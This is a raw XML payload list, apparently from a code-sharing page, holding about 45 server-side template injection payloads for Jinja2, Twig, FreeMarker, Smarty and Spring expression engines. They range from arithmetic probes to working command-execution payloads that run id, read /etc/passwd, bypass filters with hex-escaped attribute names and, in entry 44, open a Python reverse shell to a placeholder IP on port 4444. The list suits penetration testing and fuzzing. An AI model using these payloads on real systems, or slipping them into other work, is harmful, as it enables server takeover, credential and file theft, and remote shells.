This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
| <xss> | |
| <attack> | |
| <name>0</name> | |
| <code>{{2*2}}[[3*3]]</code> | |
| </attack> | |
| <attack> | |
| <name>1</name> | |
| <code>{{3*3}}</code> | |
| </attack> | |
| <attack> | |
| <name>2</name> | |
| <code>{{3*'3'}}</code> | |
| </attack> | |
| <attack> | |
| <name>4</name> | |
| <code>${6*6}</code> | |
| </attack> | |
| <attack> | |
| <name>5</name> | |
| <code>${{3*3}}</code> | |
| </attack> | |
| <attack> | |
| <name>6</name> | |
| <code>@(6+5)</code> | |
| </attack> | |
| <attack> | |
| <name>7</name> | |
| <code>#{3*3}</code> | |
| </attack> | |
| <attack> | |
| <name>8</name> | |
| <code>#{ 3 * 3 }</code> | |
| </attack> | |
| <attack> | |
| <name>9</name> | |
| <code>{{dump(app)}}</code> | |
| </attack> | |
| <attack> | |
| <name>10</name> | |
| <code>{{app.request.server.all|join(',')}}</code> | |
| </attack> | |
| <attack> | |
| <name>11</name> | |
| <code>{{config.items()}}</code> | |
| </attack> | |
| <attack> | |
| <name>12</name> | |
| <code>{{ [].class.base.subclasses() }}</code> | |
| </attack> | |
| <attack> | |
| <name>13</name> | |
| <code>{{''.class.mro()[1].subclasses()}}</code> | |
| </attack> | |
| <attack> | |
| <name>14</name> | |
| <code>{{ ''.__class__.__mro__[2].__subclasses__() }}</code> | |
| </attack> | |
| <attack> | |
| <name>15</name> | |
| <code>{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}</code> | |
| </attack> | |
| <attack> | |
| <name>16</name> | |
| <code>{{'a'.toUpperCase()}} </code> | |
| </attack> | |
| <attack> | |
| <name>17</name> | |
| <code>{{ request }}</code> | |
| </attack> | |
| <attack> | |
| <name>18</name> | |
| <code>{{self}}</code> | |
| </attack> | |
| <attack> | |
| <name>21</name> | |
| <code>[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}</code> | |
| </attack> | |
| <attack> | |
| <name>22</name> | |
| <code>${"freemarker.template.utility.Execute"?new()("id")}</code> | |
| </attack> | |
| <attack> | |
| <name>23</name> | |
| <code>{{app.request.query.filter(0,0,1024,{'options':'system'})}}</code> | |
| </attack> | |
| <attack> | |
| <name>24</name> | |
| <code>{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}</code> | |
| </attack> | |
| <attack> | |
| <name>25</name> | |
| <code>{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}</code> | |
| </attack> | |
| <attack> | |
| <name>26</name> | |
| <code>{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}</code> | |
| </attack> | |
| <attack> | |
| <name>27</name> | |
| <code>{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}</code> | |
| </attack> | |
| <attack> | |
| <name>28</name> | |
| <code>{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}</code> | |
| </attack> | |
| <attack> | |
| <name>29</name> | |
| <code>{$smarty.version}</code> | |
| </attack> | |
| <attack> | |
| <name>30</name> | |
| <code>{php}echo `id`;{/php}</code> | |
| </attack> | |
| <attack> | |
| <name>31</name> | |
| <code>{{['id']|filter('system')}}</code> | |
| </attack> | |
| <attack> | |
| <name>32</name> | |
| <code>{{['cat\x20/etc/passwd']|filter('system')}}</code> | |
| </attack> | |
| <attack> | |
| <name>33</name> | |
| <code>{{['cat$IFS/etc/passwd']|filter('system')}}</code> | |
| </attack> | |
| <attack> | |
| <name>34</name> | |
| <code>{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}</code> | |
| </attack> | |
| <attack> | |
| <name>35</name> | |
| <code>{{request|attr(["_"*2,"class","_"*2]|join)}}</code> | |
| </attack> | |
| <attack> | |
| <name>36</name> | |
| <code>{{request|attr(["__","class","__"]|join)}}</code> | |
| </attack> | |
| <attack> | |
| <name>37</name> | |
| <code>{{request|attr("__class__")}}</code> | |
| </attack> | |
| <attack> | |
| <name>38</name> | |
| <code>{{request.__class__}}</code> | |
| </attack> | |
| <attack> | |
| <name>39</name> | |
| <code>{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}</code> | |
| </attack> | |
| <attack> | |
| <name>40</name> | |
| <code>{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}</code> | |
| </attack> | |
| <attack> | |
| <name>41</name> | |
| <code>{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}</code> | |
| </attack> | |
| <attack> | |
| <name>42</name> | |
| <code>{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}</code> | |
| </attack> | |
| <attack> | |
| <name>43</name> | |
| <code>{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}</code> | |
| </attack> | |
| <attack> | |
| <name>44</name> | |
| <code>{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}</code> | |
| </attack> | |
| <attack> | |
| <name>45</name> | |
| <code>${T(java.lang.System).getenv()}</code> | |
| </attack> | |
| <attack> | |
| <name>46</name> | |
| <code>${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}</code> | |
| </attack> | |
| <attack> | |
| <name>47</name> | |
| <code>${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}</code> | |
| </attack> | |
| </xss> |